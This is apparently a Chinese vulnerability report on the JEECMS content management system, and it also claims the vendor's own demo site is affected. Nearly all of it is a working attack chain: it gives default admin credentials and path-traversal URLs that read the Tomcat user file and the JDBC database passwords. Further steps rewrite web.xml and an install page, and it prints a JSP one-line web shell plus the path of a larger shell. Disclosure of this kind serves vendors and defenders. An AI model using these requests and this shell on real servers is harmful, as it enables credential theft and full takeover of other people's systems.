### 简要描述:
JEECMS后台任意文件编辑漏洞以及官方的demo站、官方服务器安全问题
### 详细说明:
2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do
默认账户:admin
默认密码:password
获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml
修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter
("f"))).write(request.getParameter("t").getBytes());
%>
修改后的一句话目录
/install/install_setup.jsp
一句话连接成功后的jsp大马目录:
/ma.jsp
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201201/27040629b67a172b49a9dcbe26f528dd769b487e.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201201/27040629b67a172b49a9dcbe26f528dd769b487e.jpg)
[<img src="https://images.seebug.org/upload/201201/270405443c8f22df964678b652fbbcdcdcc02240.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201201/270405443c8f22df964678b652fbbcdcdcc02240.jpg)
[<img src="https://images.seebug.org/upload/201201/27040606cf3c2320fe6f08c253d6d9763f25e66f.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201201/27040606cf3c2320fe6f08c253d6d9763f25e66f.jpg)
暂无评论